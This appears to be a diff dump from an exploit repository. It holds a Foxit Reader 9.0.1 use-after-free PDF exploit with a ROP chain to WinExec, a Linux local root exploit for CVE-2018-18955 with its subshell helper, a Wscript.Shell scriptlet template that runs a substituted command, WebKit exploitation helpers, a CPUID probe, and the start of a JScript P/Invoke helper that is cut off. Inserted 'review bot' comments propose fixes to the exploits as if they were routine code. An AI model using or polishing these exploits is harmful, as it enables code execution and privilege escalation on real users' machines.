static char *featureinfo[32] = {
|
||||
"fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8",
|
||||
"apic", "unk10", "sep", "mtrr", "pge", "mca", "cmov", "pat",
|
||||
"pse36", "psn", "clfsh", "unk20", "ds", "acpi", "mmx",
|
||||
"fxsr", "sse", "sse2", "ss", "htt", "tm", "unk30", "pbe"
|
||||
}, *extendinfo[32] = {
|
||||
"sse3", "unk1", "unk2", "monitor", "ds-cpl", "unk5-vt", "unk6", "est",
|
||||
"tm2", "unk9", "cnxt-id", "unk12", "cmpxchg16b", "unk14", "unk15",
|
||||
"unk16", "unk17", "unk18", "unk19", "unk20", "unk21", "unk22", "unk23",
|
||||
"unk24", "unk25", "unk26", "unk27", "unk28", "unk29", "unk30", "unk31"
|
||||
};
|
||||
|
||||
#define cpuid(id) __asm__( "cpuid" : "=a"(eax), "=b"(ebx), "=c"(ecx), "=d"(edx) : "a"(id), "b"(0), "c"(0), "d"(0))
|
||||
#define b(val, base, end) ((val << (31-end)) >> (31-end+base))
|
||||
int main(void)
|
||||
{
|
||||
|
||||
unsigned long eax, ebx, ecx, edx;
|
||||
unsigned long i;
|
||||
|
||||
cpuid(0);
|
||||
fprintf(stdout, "VENDOR: %.4s%.4s%.4s\n", (char *)&ebx, (char *)&edx, (char *)&ecx);
|
||||
|
||||
cpuid(1);
|
||||
fprintf(stdout, "MODEL: family=%ld model=%ld stepping=%ld efamily=%ld emodel=%ld ",
|
||||
b(eax, 8, 11), b(eax, 4, 7), b(eax, 0, 3), b(eax, 20, 27), b(eax, 16, 19));
|
||||
fprintf(stdout, "brand=%ld cflush sz=%ld*8 nproc=%ld apicid=%ld\n",
|
||||
b(ebx, 0, 7), b(ebx, 8, 15), b(ebx, 16, 23), b(ebx, 24, 31));
|
||||
|
||||
fprintf(stdout, "FLAGS:");
|
||||
for (i=0 ; i<32 ; i++)
|
||||
if (edx & (1 << i))
|
||||
fprintf(stdout, " %s", featureinfo[i]);
|
||||
|
||||
for (i=0 ; i<32 ; i++)
|
||||
if (ecx & (1 << i))
|
||||
fprintf(stdout, " %s", extendinfo[i]);
|
||||
|
||||
fprintf(stdout, "\n");
|
||||
fflush(stdout);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,16 @@
|
|||
<?xml version='1.0'?>
|
||||
<package>
|
||||
<component id='giffile'>
|
||||
<registration
|
||||
description='Dummy'
|
||||
progid='giffile'
|
||||
version='1.00'
|
||||
remotable='True'>
|
||||
</registration>
|
||||
<script language='JScript'>
|
||||
<![CDATA[
|
||||
var q = new ActiveXObject('Wscript.Shell').Run("SCRIPTED_COMMAND");
|
||||
]]>
|
||||
</script>
|
||||
</component>
|
||||
</package>
|
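Review bot: `SCRIPTED_COMMAND` on the `Wscript.Shell` line is substituted into a double-quoted JScript string literal, so a command containing `"` or `\` will break the scriptlet or alter what is executed unless the generator escapes it for JScript first, and the template does not say that. Add a comment above the `<script>` element such as `<!-- SCRIPTED_COMMAND must be JScript-string-escaped by the generator (\" and \\) before substitution -->`, or have the generating code apply the same escaping it uses for its other JavaScript templates. The `remotable='True'` attribute in the registration block appears unnecessary for a scriptlet executed locally; if it is deliberate, a one-line comment on why would save the next reader a check.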
|
@ -0,0 +1,182 @@
|
|||
//
|
||||
// Tiny module that provides big (64bit) integers.
|
||||
//
|
||||
// Copyright (c) 2016 Samuel Groß
|
||||
//
|
||||
// Requires utils.js
|
||||
//
|
||||
|
||||
// Datatype to represent 64-bit integers.
|
||||
//
|
||||
// Internally, the integer is stored as a Uint8Array in little endian byte order.
|
||||
function Int64(v) {
|
||||
// The underlying byte array.
|
||||
var bytes = new Uint8Array(8);
|
||||
|
||||
switch (typeof v) {
|
||||
case 'number':
|
||||
v = '0x' + Math.floor(v).toString(16);
|
||||
case 'string':
|
||||
if (v.startsWith('0x'))
|
||||
v = v.substr(2);
|
||||
if (v.length % 2 == 1)
|
||||
v = '0' + v;
|
||||
|
||||
var bigEndian = unhexlify(v, 8);
|
||||
bytes.set(Array.from(bigEndian).reverse());
|
||||
break;
|
||||
case 'object':
|
||||
if (v instanceof Int64) {
|
||||
bytes.set(v.bytes());
|
||||
} else {
|
||||
if (v.length != 8)
|
||||
throw TypeError("Array must have excactly 8 elements.");
|
||||
bytes.set(v);
|
||||
}
|
||||
break;
|
||||
case 'undefined':
|
||||
break;
|
||||
default:
|
||||
throw TypeError("Int64 constructor requires an argument.");
|
||||
}
|
||||
|
||||
// Return a double whith the same underlying bit representation.
|
||||
this.asDouble = function() {
|
||||
// Check for NaN
|
||||
if (bytes[7] == 0xff && (bytes[6] == 0xff || bytes[6] == 0xfe))
|
||||
throw new RangeError("Integer can not be represented by a double");
|
||||
|
||||
return Struct.unpack(Struct.float64, bytes);
|
||||
};
|
||||
|
||||
// Return a javascript value with the same underlying bit representation.
|
||||
// This is only possible for integers in the range [0x0001000000000000, 0xffff000000000000)
|
||||
// due to double conversion constraints.
|
||||
this.asJSValue = function() {
|
||||
if ((bytes[7] == 0 && bytes[6] == 0) || (bytes[7] == 0xff && bytes[6] == 0xff))
|
||||
throw new RangeError("Integer can not be represented by a JSValue");
|
||||
|
||||
// For NaN-boxing, JSC adds 2^48 to a double value's bit pattern.
|
||||
this.assignSub(this, 0x1000000000000);
|
||||
var res = Struct.unpack(Struct.float64, bytes);
|
||||
this.assignAdd(this, 0x1000000000000);
|
||||
|
||||
return res;
|
||||
};
|
||||
|
||||
// Return the underlying bytes of this number as array.
|
||||
this.bytes = function() {
|
||||
return Array.from(bytes);
|
||||
};
|
||||
|
||||
// Return the byte at the given index.
|
||||
this.byteAt = function(i) {
|
||||
return bytes[i];
|
||||
};
|
||||
|
||||
// Return the value of this number as unsigned hex string.
|
||||
this.toString = function() {
|
||||
return '0x' + hexlify(Array.from(bytes).reverse());
|
||||
};
|
||||
|
||||
// Basic arithmetic.
|
||||
// These functions assign the result of the computation to their 'this' object.
|
||||
|
||||
// Decorator for Int64 instance operations. Takes care
|
||||
// of converting arguments to Int64 instances if required.
|
||||
function operation(f, nargs) {
|
||||
return function() {
|
||||
if (arguments.length != nargs)
|
||||
throw Error("Not enough arguments for function " + f.name);
|
||||
for (var i = 0; i < arguments.length; i++)
|
||||
if (!(arguments[i] instanceof Int64))
|
||||
arguments[i] = new Int64(arguments[i]);
|
||||
return f.apply(this, arguments);
|
||||
};
|
||||
}
|
||||
|
||||
// this = -n (two's complement)
|
||||
this.assignNeg = operation(function neg(n) {
|
||||
for (var i = 0; i < 8; i++)
|
||||
bytes[i] = ~n.byteAt(i);
|
||||
|
||||
return this.assignAdd(this, Int64.One);
|
||||
}, 1);
|
||||
|
||||
// this = a + b
|
||||
this.assignAdd = operation(function add(a, b) {
|
||||
var carry = 0;
|
||||
for (var i = 0; i < 8; i++) {
|
||||
var cur = a.byteAt(i) + b.byteAt(i) + carry;
|
||||
carry = cur > 0xff | 0;
|
||||
bytes[i] = cur;
|
||||
}
|
||||
return this;
|
||||
}, 2);
|
||||
|
||||
// this = a - b
|
||||
this.assignSub = operation(function sub(a, b) {
|
||||
var carry = 0;
|
||||
for (var i = 0; i < 8; i++) {
|
||||
var cur = a.byteAt(i) - b.byteAt(i) - carry;
|
||||
carry = cur < 0 | 0;
|
||||
bytes[i] = cur;
|
||||
}
|
||||
return this;
|
||||
}, 2);
|
||||
|
||||
// this = a ^ b
|
||||
this.assignXor = operation(function sub(a, b) {
|
||||
for (var i = 0; i < 8; i++) {
|
||||
bytes[i] = a.byteAt(i) ^ b.byteAt(i);
|
||||
}
|
||||
return this;
|
||||
}, 2);
|
||||
|
||||
// this = a & b
|
||||
this.assignAnd = operation(function sub(a, b) {
|
||||
for (var i = 0; i < 8; i++) {
|
||||
bytes[i] = a.byteAt(i) & b.byteAt(i);
|
||||
}
|
||||
return this;
|
||||
}, 2)
|
||||
}
|
||||
|
||||
// Constructs a new Int64 instance with the same bit representation as the provided double.
|
||||
Int64.fromDouble = function(d) {
|
||||
var bytes = Struct.pack(Struct.float64, d);
|
||||
return new Int64(bytes);
|
||||
};
|
||||
|
||||
// Convenience functions. These allocate a new Int64 to hold the result.
|
||||
|
||||
// Return -n (two's complement)
|
||||
function Neg(n) {
|
||||
return (new Int64()).assignNeg(n);
|
||||
}
|
||||
|
||||
// Return a + b
|
||||
function Add(a, b) {
|
||||
return (new Int64()).assignAdd(a, b);
|
||||
}
|
||||
|
||||
// Return a - b
|
||||
function Sub(a, b) {
|
||||
return (new Int64()).assignSub(a, b);
|
||||
}
|
||||
|
||||
// Return a ^ b
|
||||
function Xor(a, b) {
|
||||
return (new Int64()).assignXor(a, b);
|
||||
}
|
||||
|
||||
// Return a & b
|
||||
function And(a, b) {
|
||||
return (new Int64()).assignAnd(a, b);
|
||||
}
|
||||
|
||||
// Some commonly used numbers.
|
||||
Int64.Zero = new Int64(0);
|
||||
Int64.One = new Int64(1);
|
||||
|
||||
// That's all the arithmetic we need for exploiting WebKit.. :)
|
Binary file not shown.
|
@ -0,0 +1,78 @@
|
|||
//
|
||||
// Utility functions.
|
||||
//
|
||||
// Copyright (c) 2016 Samuel Groß
|
||||
//
|
||||
|
||||
// Return the hexadecimal representation of the given byte.
|
||||
function hex(b) {
|
||||
return ('0' + b.toString(16)).substr(-2);
|
||||
}
|
||||
|
||||
// Return the hexadecimal representation of the given byte array.
|
||||
function hexlify(bytes) {
|
||||
var res = [];
|
||||
for (var i = 0; i < bytes.length; i++)
|
||||
res.push(hex(bytes[i]));
|
||||
|
||||
return res.join('');
|
||||
}
|
||||
|
||||
// Return the binary data represented by the given hexdecimal string.
|
||||
function unhexlify(hexstr) {
|
||||
if (hexstr.length % 2 == 1)
|
||||
throw new TypeError("Invalid hex string");
|
||||
|
||||
var bytes = new Uint8Array(hexstr.length / 2);
|
||||
for (var i = 0; i < hexstr.length; i += 2)
|
||||
bytes[i/2] = parseInt(hexstr.substr(i, 2), 16);
|
||||
|
||||
return bytes;
|
||||
}
|
||||
|
||||
function hexdump(data) {
|
||||
if (typeof data.BYTES_PER_ELEMENT !== 'undefined')
|
||||
data = Array.from(data);
|
||||
|
||||
var lines = [];
|
||||
for (var i = 0; i < data.length; i += 16) {
|
||||
var chunk = data.slice(i, i+16);
|
||||
var parts = chunk.map(hex);
|
||||
if (parts.length > 8)
|
||||
parts.splice(8, 0, ' ');
|
||||
lines.push(parts.join(' '));
|
||||
}
|
||||
|
||||
return lines.join('\n');
|
||||
}
|
||||
|
||||
// Simplified version of the similarly named python module.
|
||||
var Struct = (function() {
|
||||
// Allocate these once to avoid unecessary heap allocations during pack/unpack operations.
|
||||
var buffer = new ArrayBuffer(8);
|
||||
var byteView = new Uint8Array(buffer);
|
||||
var uint32View = new Uint32Array(buffer);
|
||||
var float64View = new Float64Array(buffer);
|
||||
|
||||
return {
|
||||
pack: function(type, value) {
|
||||
var view = type; // See below
|
||||
view[0] = value;
|
||||
return new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT);
|
||||
},
|
||||
|
||||
unpack: function(type, bytes) {
|
||||
if (bytes.length !== type.BYTES_PER_ELEMENT)
|
||||
throw Error("Invalid bytearray");
|
||||
|
||||
var view = type; // See below
|
||||
byteView.set(bytes);
|
||||
return view[0];
|
||||
},
|
||||
|
||||
// Available types.
|
||||
int8: byteView,
|
||||
int32: uint32View,
|
||||
float64: float64View
|
||||
};
|
||||
})();
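Review bot: `pack` on the `pack: function(type, value)` line returns a view over the shared `buffer` rather than a copy, so bytes a caller keeps are silently overwritten by the next `pack` or `unpack` call on the same `Struct`; `Int64.fromDouble` appears to survive this only because the Int64 constructor copies via `bytes.set(v)`, but any caller that holds on to the result is exposed. Returning a copy fixes it: `return new Uint8Array(buffer.slice(0, type.BYTES_PER_ELEMENT));`. The two `// See below` comments on the `var view = type;` lines point at nothing that follows; replacing them with `// each type tag is itself a typed-array view over the shared 8-byte buffer` would explain the indirection. Separately, `unhexlify` only rejects odd-length input, since `parseInt(..., 16)` yields NaN for non-hex characters and the Uint8Array stores that as 0, so malformed strings are accepted silently.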
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,125 @@
|
|||
%PDF
|
||||
1 0 obj
|
||||
<</Pages 1 0 R /OpenAction 2 0 R>>
|
||||
2 0 obj
|
||||
<</S /JavaScript /JS (
|
||||
|
||||
var heap_ptr = 0;
|
||||
var foxit_base = 0;
|
||||
var pwn_array = [];
|
||||
|
||||
function prepare_heap(size){
|
||||
var arr = new Array(size);
|
||||
for(var i = 0; i < size; i++){
|
||||
arr[i] = this.addAnnot({type: "Text"});;
|
||||
if (typeof arr[i] == "object"){
|
||||
arr[i].destroy();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function gc() {
|
||||
const maxMallocBytes = 128 * 0x100000;
|
||||
for (var i = 0; i < 3; i++) {
|
||||
var x = new ArrayBuffer(maxMallocBytes);
|
||||
}
|
||||
}
|
||||
|
||||
function alloc_at_leak(){
|
||||
for (var i = 0; i < 0x64; i++){
|
||||
pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
|
||||
}
|
||||
}
|
||||
|
||||
function control_memory(){
|
||||
for (var i = 0; i < 0x64; i++){
|
||||
for (var j = 0; j < pwn_array[i].length; j++){
|
||||
pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function leak_vtable(){
|
||||
var a = this.addAnnot({type: "Text"});
|
||||
|
||||
a.destroy();
|
||||
gc();
|
||||
|
||||
prepare_heap(0x400);
|
||||
var test = new ArrayBuffer(0x60);
|
||||
var stolen = new Int32Array(test);
|
||||
|
||||
var leaked = stolen[0] & 0xffff0000;
|
||||
foxit_base = leaked - 0x01f50000;
|
||||
}
|
||||
|
||||
function leak_heap_chunk(){
|
||||
var a = this.addAnnot({type: "Text"});
|
||||
a.destroy();
|
||||
prepare_heap(0x400);
|
||||
|
||||
var test = new ArrayBuffer(0x60);
|
||||
var stolen = new Int32Array(test);
|
||||
|
||||
alloc_at_leak();
|
||||
heap_ptr = stolen[1];
|
||||
}
|
||||
|
||||
function reclaim(){
|
||||
var arr = new Array(0x10);
|
||||
for (var i = 0; i < arr.length; i++) {
|
||||
arr[i] = new ArrayBuffer(0x60);
|
||||
var rop = new Int32Array(arr[i]);
|
||||
|
||||
rop[0x00] = heap_ptr; // pointer to our stack pivot from the TypedArray leak
|
||||
rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
|
||||
rop[0x02] = 0x72727272; // junk
|
||||
rop[0x03] = foxit_base + 0x00001450 // pop ebp; ret
|
||||
rop[0x04] = 0xffffffff; // ret of WinExec
|
||||
rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
|
||||
rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
|
||||
rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
|
||||
rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
|
||||
rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
|
||||
rop[0x0a] = foxit_base + 0x0041c6ca; // ret
|
||||
rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
|
||||
<%= rop %>
|
||||
rop[0x17] = 0x00000000; // adios, amigo
|
||||
}
|
||||
}
|
||||
|
||||
function trigger_uaf(){
|
||||
var that = this;
|
||||
var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
|
||||
var arr = [1];
|
||||
Object.defineProperties(arr,{
|
||||
"0":{
|
||||
get: function () {
|
||||
|
||||
that.getAnnot(0, "uaf").destroy();
|
||||
|
||||
reclaim();
|
||||
return 1;
|
||||
}
|
||||
}
|
||||
});
|
||||
|
||||
a.point = arr;
|
||||
}
|
||||
|
||||
function main(){
|
||||
leak_heap_chunk();
|
||||
leak_vtable();
|
||||
control_memory();
|
||||
trigger_uaf();
|
||||
}
|
||||
|
||||
if (app.platform == "WIN"){
|
||||
if (app.isFoxit == "Foxit Reader"){
|
||||
if (app.appFoxitVersion == "9.0.1.1049"){
|
||||
main();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
)>> trailer <</Root 1 0 R>>
|
|
@ -0,0 +1,52 @@
|
|||
// subshell.c
|
||||
// author: Jann Horn
|
||||
// source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
|
||||
|
||||
#define _GNU_SOURCE
|
||||
#include <unistd.h>
|
||||
#include <grp.h>
|
||||
#include <err.h>
|
||||
#include <stdio.h>
|
||||
#include <fcntl.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/un.h>
|
||||
#include <sched.h>
|
||||
#include <sys/wait.h>
|
||||
|
||||
int main() {
|
||||
int sync_pipe[2];
|
||||
char dummy;
|
||||
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) err(1, "pipe");
|
||||
|
||||
pid_t child = fork();
|
||||
if (child == -1) err(1, "fork");
|
||||
if (child == 0) {
|
||||
close(sync_pipe[1]);
|
||||
if (unshare(CLONE_NEWUSER)) err(1, "unshare userns");
|
||||
if (write(sync_pipe[0], "X", 1) != 1) err(1, "write to sock");
|
||||
|
||||
if (read(sync_pipe[0], &dummy, 1) != 1) err(1, "read from sock");
|
||||
execl("/bin/bash", "bash", NULL);
|
||||
err(1, "exec");
|
||||
}
|
||||
|
||||
close(sync_pipe[0]);
|
||||
if (read(sync_pipe[1], &dummy, 1) != 1) err(1, "read from sock");
|
||||
char pbuf[100];
|
||||
sprintf(pbuf, "/proc/%d", (int)child);
|
||||
if (chdir(pbuf)) err(1, "chdir");
|
||||
const char *id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n";
|
||||
int uid_map = open("uid_map", O_WRONLY);
|
||||
if (uid_map == -1) err(1, "open uid map");
|
||||
if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write uid map");
|
||||
close(uid_map);
|
||||
int gid_map = open("gid_map", O_WRONLY);
|
||||
if (gid_map == -1) err(1, "open gid map");
|
||||
if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write gid map");
|
||||
close(gid_map);
|
||||
if (write(sync_pipe[1], "X", 1) != 1) err(1, "write to sock");
|
||||
|
||||
int status;
|
||||
if (wait(&status) != child) err(1, "wait");
|
||||
return 0;
|
||||
}
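Review bot: `strlen` is used on the `write(uid_map, ...)` and `write(gid_map, ...)` lines but `<string.h>` is never included, so the function is implicitly declared; GCC 14 and Clang 16 treat that as an error by default, and older toolchains only work because the implicit `int` return happens to be wide enough here. Add `#include <string.h>` to the include block. Those two comparisons also mix the `ssize_t` result of `write` with the `size_t` result of `strlen`, which `-Wsign-compare` flags; storing `size_t len = strlen(id_mapping);` once and comparing `write(...) != (ssize_t)len` is the cleaner form.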
|
Binary file not shown.
|
@ -0,0 +1,272 @@
|
|||
// subuid_shell.c - Linux local root exploit for CVE-2018-18955
|
||||
// Exploits broken uid/gid mapping in nested user namespaces.
|
||||
// ---
|
||||
// Mostly stolen from Jann Horn's exploit:
|
||||
// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
|
||||
// Some code stolen from Xairy's exploits:
|
||||
// - https://github.com/xairy/kernel-exploits
|
||||
// ---
|
||||
// <bcoles@gmail.com>
|
||||
// - added auto subordinate id mapping
|
||||
// https://github.com/bcoles/kernel-exploits/tree/cve-2018-18955
|
||||
|
||||
#define _GNU_SOURCE
|
||||
|
||||
#include <unistd.h>
|
||||
#include <fcntl.h>
|
||||
#include <grp.h>
|
||||
#include <pwd.h>
|
||||
#include <sched.h>
|
||||
#include <stdio.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/un.h>
|
||||
#include <sys/wait.h>
|
||||
#include <stdarg.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <signal.h>
|
||||
#include <sys/prctl.h>
|
||||
|
||||
#define DEBUG
|
||||
|
||||
#ifdef DEBUG
|
||||
# define dprintf printf
|
||||
#else
|
||||
# define dprintf
|
||||
#endif
|
||||
|
||||
char* SUBSHELL = "./subshell";
|
||||
|
||||
|
||||
// * * * * * * * * * * * * * * * * * File I/O * * * * * * * * * * * * * * * * *
|
||||
|
||||
#define CHUNK_SIZE 1024
|
||||
|
||||
int read_file(const char* file, char* buffer, int max_length) {
|
||||
int f = open(file, O_RDONLY);
|
||||
if (f == -1)
|
||||
return -1;
|
||||
int bytes_read = 0;
|
||||
while (1) {
|
||||
int bytes_to_read = CHUNK_SIZE;
|
||||
if (bytes_to_read > max_length - bytes_read)
|
||||
bytes_to_read = max_length - bytes_read;
|
||||
int rv = read(f, &buffer[bytes_read], bytes_to_read);
|
||||
if (rv == -1)
|
||||
return -1;
|
||||
bytes_read += rv;
|
||||
if (rv == 0)
|
||||
return bytes_read;
|
||||
}
|
||||
}
|
||||
|
||||
static int write_file(const char* file, const char* what, ...) {
|
||||
char buf[1024];
|
||||
va_list args;
|
||||
va_start(args, what);
|
||||
vsnprintf(buf, sizeof(buf), what, args);
|
||||
va_end(args);
|
||||
buf[sizeof(buf) - 1] = 0;
|
||||
int len = strlen(buf);
|
||||
|
||||
int fd = open(file, O_WRONLY | O_CLOEXEC);
|
||||
if (fd == -1)
|
||||
return -1;
|
||||
if (write(fd, buf, len) != len) {
|
||||
close(fd);
|
||||
return -1;
|
||||
}
|
||||
close(fd);
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
// * * * * * * * * * * * * * * * * * Map * * * * * * * * * * * * * * * * *
|
||||
|
||||
int get_subuid(char* output, int max_length) {
|
||||
char buffer[1024];
|
||||
char* path = "/etc/subuid";
|
||||
int length = read_file(path, &buffer[0], sizeof(buffer));
|
||||
if (length == -1)
|
||||
return -1;
|
||||
|
||||
int real_uid = getuid();
|
||||
struct passwd *u = getpwuid(real_uid);
|
||||
|
||||
char needle[1024];
|
||||
sprintf(needle, "%s:", u->pw_name);
|
||||
int needle_length = strlen(needle);
|
||||
char* found = memmem(&buffer[0], length, needle, needle_length);
|
||||
if (found == NULL)
|
||||
return -1;
|
||||
|
||||
int i;
|
||||
for (i = 0; found[needle_length + i] != ':'; i++) {
|
||||
if (i >= max_length)
|
||||
return -1;
|
||||
if ((found - &buffer[0]) + needle_length + i >= length)
|
||||
return -1;
|
||||
output[i] = found[needle_length + i];
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
int get_subgid(char* output, int max_length) {
|
||||
char buffer[1024];
|
||||
char* path = "/etc/subgid";
|
||||
int length = read_file(path, &buffer[0], sizeof(buffer));
|
||||
if (length == -1)
|
||||
return -1;
|
||||
|
||||
int real_gid = getgid();
|
||||
struct group *g = getgrgid(real_gid);
|
||||
|
||||
char needle[1024];
|
||||
sprintf(needle, "%s:", g->gr_name);
|
||||
int needle_length = strlen(needle);
|
||||
char* found = memmem(&buffer[0], length, needle, needle_length);
|
||||
if (found == NULL)
|
||||
return -1;
|
||||
|
||||
int i;
|
||||
for (i = 0; found[needle_length + i] != ':'; i++) {
|
||||
if (i >= max_length)
|
||||
return -1;
|
||||
if ((found - &buffer[0]) + needle_length + i >= length)
|
||||
return -1;
|
||||
output[i] = found[needle_length + i];
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * *
|
||||
|
||||
int main(int argc, char** argv) {
|
||||
if (argc > 1) SUBSHELL = argv[1];
|
||||
|
||||
dprintf("[.] starting\n");
|
||||
|
||||
dprintf("[.] setting up namespace\n");
|
||||
|
||||
int sync_pipe[2];
|
||||
char dummy;
|
||||
|
||||
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) {
|
||||
dprintf("[-] pipe\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
pid_t child = fork();
|
||||
|
||||
if (child == -1) {
|
||||
dprintf("[-] fork");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (child == 0) {
|
||||
prctl(PR_SET_PDEATHSIG, SIGKILL);
|
||||
close(sync_pipe[1]);
|
||||
|
||||
if (unshare(CLONE_NEWUSER) != 0) {
|
||||
dprintf("[-] unshare(CLONE_NEWUSER)\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (unshare(CLONE_NEWNET) != 0) {
|
||||
dprintf("[-] unshare(CLONE_NEWNET)\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (write(sync_pipe[0], "X", 1) != 1) {
|
||||
dprintf("write to sock\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (read(sync_pipe[0], &dummy, 1) != 1) {
|
||||
dprintf("[-] read from sock\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (setgid(0)) {
|
||||
dprintf("[-] setgid");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (setuid(0)) {
|
||||
printf("[-] setuid");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
execl(SUBSHELL, "", NULL);
|
||||
|
||||
dprintf("[-] executing subshell failed\n");
|
||||
}
|
||||
|
||||
close(sync_pipe[0]);
|
||||
|
||||
if (read(sync_pipe[1], &dummy, 1) != 1) {
|
||||
dprintf("[-] read from sock\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
char path[256];
|
||||
sprintf(path, "/proc/%d/setgroups", (int)child);
|
||||
|
||||
if (write_file(path, "deny") == -1) {
|
||||
dprintf("[-] denying setgroups failed\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
dprintf("[~] done, namespace sandbox set up\n");
|
||||
|
||||
dprintf("[.] mapping subordinate ids\n");
|
||||
char subuid[64];
|
||||
char subgid[64];
|
||||
|
||||
if (get_subuid(&subuid[0], sizeof(subuid))) {
|
||||
dprintf("[-] couldn't find subuid map in /etc/subuid\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (get_subgid(&subgid[0], sizeof(subgid))) {
|
||||
dprintf("[-] couldn't find subgid map in /etc/subgid\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
dprintf("[.] subuid: %s\n", subuid);
|
||||
dprintf("[.] subgid: %s\n", subgid);
|
||||
|
||||
char cmd[256];
|
||||
|
||||
sprintf(cmd, "newuidmap %d 0 %s 1000", (int)child, subuid);
|
||||
if (system(cmd)) {
|
||||
dprintf("[-] newuidmap failed");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
sprintf(cmd, "newgidmap %d 0 %s 1000", (int)child, subgid);
|
||||
if (system(cmd)) {
|
||||
dprintf("[-] newgidmap failed");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
dprintf("[~] done, mapped subordinate ids\n");
|
||||
|
||||
dprintf("[.] executing subshell\n");
|
||||
|
||||
if (write(sync_pipe[1], "X", 1) != 1) {
|
||||
dprintf("[-] write to sock");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
int status;
|
||||
if (wait(&status) != child) {
|
||||
dprintf("[-] wait");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
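Review bot: `get_subuid` never NUL-terminates `output`: the loop `for (i = 0; found[needle_length + i] != ':'; i++)` copies characters but no terminator is written after it, so `subuid` (declared uninitialized as `char subuid[64]` in `main`) reaches `dprintf("[.] subuid: %s\n", subuid)` and `sprintf(cmd, "newuidmap %d 0 %s 1000", ...)` with whatever stack contents follow the copied digits; `get_subgid` has the same defect. Tighten the bound to `if (i >= max_length - 1) return -1;` and add `output[i] = '\0';` after the loop in both functions. The `needle` search is also unanchored, so a username that is a suffix of another account name in `/etc/subuid` matches the wrong line; requiring `found == &buffer[0] || found[-1] == '\n'` fixes that. `getpwuid` and `getgrgid` may return NULL, and `u->pw_name` / `g->gr_name` dereference them unchecked.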
|
Binary file not shown.
|
@ -0,0 +1,77 @@
|
|||
import System;
|
||||
import System.Runtime.InteropServices;
|
||||
import System.Reflection;
|
||||
import System.Reflection.Emit;
|
||||
import System.Runtime;
|
||||
import System.Text;
|
||||
|
||||
function InvokeWin32(dllName:String, returnType:Type,
|
||||
methodName:String, parameterTypes:Type[], parameters:Object[])
|
||||
{
|
||||
// Begin to build the dynamic assembly
|
||||
var domain = AppDomain.CurrentDomain;
|
||||
var name = new System.Reflection.AssemblyName('PInvokeAssembly');
|
||||
var assembly = domain.DefineDynamicAssembly(name, AssemblyBuilderAccess.Run);
|
||||
var module = assembly.DefineDynamicModule('PInvokeModule');
|
||||
var type = module.DefineType('PInvokeType',TypeAttributes.Public + TypeAttributes.BeforeFieldInit);
|
||||
|
||||
// Define the actual P/Invoke method
|
||||
var method = type.DefineMethod(methodName, MethodAttributes.Public + MethodAttributes.HideBySig + MethodAttributes.Static + MethodAttributes.PinvokeImpl, returnType, parameterTypes);
|
||||
|
||||
// Apply the P/Invoke constructor
|
||||
var ctor = System.Runtime.InteropServices.DllImportAttribute.GetConstructor([Type.GetType("System.String")]);
|
||||
var attr = new System.Reflection.Emit.CustomAttributeBuilder(ctor, [dllName]);
|
||||
method.SetCustomAttribute(attr);
|
||||
|
||||
// Create the temporary type, and invoke the method.
|
||||
var realType = type.CreateType();
|
||||
